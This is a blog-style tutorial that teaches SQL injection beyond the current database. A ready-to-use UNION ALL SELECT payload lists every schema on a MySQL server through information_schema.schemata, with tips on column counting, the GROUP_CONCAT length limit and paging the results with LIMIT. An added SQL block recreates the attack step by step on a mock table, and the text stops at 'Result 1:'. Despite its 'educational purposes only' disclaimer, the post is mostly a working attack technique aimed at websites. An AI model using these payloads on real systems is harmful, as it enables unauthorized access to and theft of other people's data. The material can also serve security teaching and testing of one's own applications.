Hey there! Back again with another article about SQL Injection techniques.

So, I've been seeing a lot of beginners at SQL injection who, while extracting data from the database, ignore the fact that they can do much better.

Note that I have no intention of damaging any website or organization. This post is for educational purposes only.

The problem:

The problem with beginners is that they extract data only from the current database, the one in which the vulnerable query is executed. They don't even try to reach other databases and their content. Intermediate and advanced SQL injectors will already know that if the vulnerable query runs under a database account with sufficient privileges, the attacker can read every other database on that SQL server that the account has rights to. What you can enumerate is bounded by the privileges of the application's database user, not by the database the application happens to be using.

So, let's take a look at how it's actually done.

The Solution:

LeT’s SQL iNjEcT!!!

Step 1:

Well, the first part of the exploitation sequence is to extract the names of the databases present on the server. This can be done quite easily using GROUP_CONCAT() inside a UNION SELECT.

Quick Tip: UNION ALL SELECT can be used instead of UNION SELECT during SQL injection. A plain UNION performs an implicit DISTINCT on the combined result, which costs a sort and removes duplicate rows; UNION ALL simply appends the second result set and keeps duplicates.

So, let’s extract database names on the server.

Query: ?param=' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(schema_name,0x0a) as CHAR(4096)) FROM (SELECT * FROM information_schema.schemata)a),3,4,5,6,7,8,9 -- -

Explanation:

The original query returns 9 columns. You can find the count using the ORDER BY technique: ORDER BY n succeeds while n is at most the number of columns and throws an "Unknown column" error one past it. So I wrote UNION ALL SELECT 1,2,3,4,5,6,7,8,9, checked which of those marker values is reflected in the page (position 2 here), and replaced that position with my own nested SELECT.

GROUP_CONCAT() concatenates the values from all rows of the result into a single string, which matters here because the UNION subquery at position 2 may return only one value. I used a nested SELECT: the inner SELECT pulls every row of information_schema.schemata, and the outer one collapses the schema_name column into one string, with 0x0a (a newline) appended to each name.

information_schema.schemata is a table (a read-only view in MySQL) that lists every database on the server along with its default character set and collation. Note that MySQL only shows you the rows for databases the connecting account has some kind of privilege on, so the list you get back reflects the application user's privileges, not necessarily everything on the server.

The CAST(... AS CHAR(4096)) is a common idiom, but it does not increase how much GROUP_CONCAT() returns: the aggregated string is truncated at group_concat_max_len bytes (default 1024) before the cast is applied, and that server variable cannot be changed from within a single injected SELECT. What the cast does do is give the injected column an explicit character type, which avoids type and collation errors when the UNION merges it with the original column. If the database list is truncated, paginate instead: LIMIT m,n in MySQL returns n rows starting at zero-based offset m, so LIMIT 0,1, LIMIT 1,1, LIMIT 2,1 and so on walks the result one database per request.
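To make the steps above concrete, here is the same sequence run directly in a MySQL client, as an added example that is not part of the original post. It assumes a hypothetical vulnerable query SELECT * FROM products WHERE name = '<param>' with 9 columns (the products table and its column names are invented for the example), and an account with the same privileges as the vulnerable application. Running the injected subquery this way shows exactly what the UNION payload will return, how the group_concat_max_len cap behaves, and how LIMIT offset,1 walks the list one database at a time.

```sql
-- Hypothetical 9-column table standing in for the vulnerable application's
-- query (constructed for this example; not from the original post).
CREATE TABLE products (
  id INT, name VARCHAR(50), price INT, stock INT, c5 INT, c6 INT, c7 INT, c8 INT, c9 INT
);
INSERT INTO products VALUES (1, 'widget', 10, 5, 0, 0, 0, 0, 0);

-- Step 1: column-count probe. ORDER BY 9 succeeds, ORDER BY 10 fails with
-- "Unknown column '10' in 'order clause'". Injected form: ?param=' ORDER BY 9 -- -
SELECT * FROM products WHERE name = '' ORDER BY 9;
-- SELECT * FROM products WHERE name = '' ORDER BY 10;   -- error: only 9 columns

-- Step 2: the cap that actually limits GROUP_CONCAT() output. Default is 1024
-- bytes; CAST(... AS CHAR(4096)) applied afterwards cannot recover what was cut.
SHOW VARIABLES LIKE 'group_concat_max_len';

-- Step 3: the inner query from the payload, with an explicit separator so the
-- row boundaries are unambiguous. Only databases this account has some
-- privilege on appear in information_schema.schemata.
SELECT GROUP_CONCAT(schema_name SEPARATOR 0x0a) FROM information_schema.schemata;

-- Step 4: when the concatenated list is truncated, walk it one row per request.
-- LIMIT offset,count is zero-based: LIMIT 0,1 is the first database, LIMIT 1,1 the second.
SELECT schema_name FROM information_schema.schemata LIMIT 0,1;
SELECT schema_name FROM information_schema.schemata LIMIT 1,1;

-- Step 5: the full statement as the server sees it for the injected request
--   ?param=' AND 1=2 UNION ALL SELECT 1,(...),3,4,5,6,7,8,9 -- -
-- AND 1=2 empties the original result so only the UNION row is reflected.
SELECT * FROM products WHERE name = '' AND 1=2
UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(schema_name,0x0a) AS CHAR(4096))
  FROM (SELECT * FROM information_schema.schemata)a),3,4,5,6,7,8,9 -- -
;
```

Compare the output of Step 3 with Step 5: if Step 3 is shorter than the number of databases you expect and ends mid-name, you have hit group_concat_max_len and should switch to the Step 4 loop, incrementing the offset each request, rather than enlarging the CAST.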

Result 1: